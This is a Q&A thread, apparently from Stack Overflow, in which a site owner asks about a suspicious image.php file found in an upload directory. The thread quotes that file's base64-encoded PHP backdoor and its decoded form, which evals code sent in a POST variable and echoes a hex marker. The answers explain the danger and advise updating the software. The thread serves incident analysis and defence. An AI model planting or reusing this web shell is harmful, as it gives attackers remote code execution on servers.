问题
Ok so here's what I've googled:
It seems there is an uploaded file named "image.php" that is uploaded in a qcubed directory.
That image.php file contains the following base64 code:
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
decoded it adds to this:
if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
Searching for the outputed string I found simillar qcubed vulnerabilities on other sites.
Decoding the last echoed string I got:
196.231-172.28:ifacermpubmice:afac42eri02
Which I really don`t understand what it does (using:http://ostermiller.org/calc/encode.html).
Can you please explain me what in particular I`m facing here? What security vulnerability I should adress in order to fix this?
回答1:
The script will execute any PHP code it gets from the e POST variable, which of course is a horrible, most dangerous vulnerability.
The echo statement might be a confirmation for the attacking script that the correct version is installed or something.
However, this is only dangerous if the image.php file can actually be executed in that directory. It's hard to give advice on what to do without knowing how the file got there in the first place.
回答2:
Most likely a script kiddie used an exploit to break into your site. Make sure your PHP application and libraries are up to date.
来源:https://stackoverflow.com/questions/4245594/what-does-eval-on-base64-encoded-poste-variable-actually-do